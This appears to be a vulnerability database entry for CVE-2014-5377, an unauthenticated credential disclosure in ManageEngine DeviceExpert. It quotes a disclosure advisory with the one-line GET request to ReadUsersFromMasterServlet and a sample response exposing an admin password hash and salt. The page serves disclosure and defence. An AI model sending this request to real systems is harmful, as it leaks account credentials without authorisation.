CVE-2014-5377
Description
ReadUsersFromMasterServlet in ManageEngine DeviceExpert before 5.9 build 5981 allows remote attackers to obtain user account credentials via a direct request.
Predictions
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
No mitigations published for this CVE yet.
The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or โ if you've already worked around this in production โ publish your fix to the community-verified tier.
โ Propose a mitigation on Community โ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here withsource_tier=community-verified.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
ManageEngine DeviceExpert 5.9 - User Credential Disclosure
>> User credential disclosure in ManageEngine DeviceExpert 5.9
>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security
==========================================================================
>> Background on the affected product:
"DeviceExpert is a webโbased, multi vendor network change, configuration and compliance management (NCCCM) solution for switches, routers, firewalls and other network devices. Trusted by thousands of network administrators around the world, DeviceExpert helps automate and take total control of the entire life cycle of device configuration management."
>> Technical details:
Vulnerability: User credential disclosure / CVE-2014-5377
Constraints: no authentication or any other information needed.
Affected versions: UNFIXED as of 27/08/2014 - current version 5.9 build 5980 is vulnerable, older versions likely vulnerable
GET /ReadUsersFromMasterServlet
Example response:
<?xml version="1.0" encoding="UTF-8"?><discoveryresult><discoverydata><username>admin</username><userrole>Administrator</userrole><password>Ok6/FqR5WtJY5UCLrnvjQQ==</password><emailid>noreply@zohocorp.com</emailid><saltvalue>12345678</saltvalue></discoverydata></discoveryresult>
The passwords are a salted MD5 hash.
Metasploit modules
Application impact
| Vendor | Product | Versions | Fixed |
|---|---|---|---|
| manageengine | device_expert | {"endIncluding":"5.9"} | |
References
- http://packetstormsecurity.com/files/128019/ManageEngine-DeviceExpert-5.9-Credential-Disclosure.html
- http://seclists.org/fulldisclosure/2014/Aug/75
- http://seclists.org/fulldisclosure/2014/Aug/76
- http://seclists.org/fulldisclosure/2014/Aug/84
- http://www.exploit-db.com/exploits/34449
- http://www.manageengine.com/products/device-expert/release-notes.html
- http://www.securityfocus.com/archive/1/533250/100/0/threaded
- http://www.securityfocus.com/bid/69443
- https://exchange.xforce.ibmcloud.com/vulnerabilities/95562
- https://raw.githubusercontent.com/pedrib/PoC/master/me_deviceexpert-5.txt
- http://packetstormsecurity.com/files/128019/ManageEngine-DeviceExpert-5.9-Credential-Disclosure.html
- http://seclists.org/fulldisclosure/2014/Aug/75
- http://seclists.org/fulldisclosure/2014/Aug/76
- http://seclists.org/fulldisclosure/2014/Aug/84
- http://www.exploit-db.com/exploits/34449
- http://www.manageengine.com/products/device-expert/release-notes.html
- http://www.securityfocus.com/archive/1/533250/100/0/threaded
- http://www.securityfocus.com/bid/69443
- https://exchange.xforce.ibmcloud.com/vulnerabilities/95562
- https://raw.githubusercontent.com/pedrib/PoC/master/me_deviceexpert-5.txt
CWEs
CWE-200
Community-verified mitigations for this CVE will appear above when contributors publish them.
Verify integrity in audit chain (admin only). AS-IS.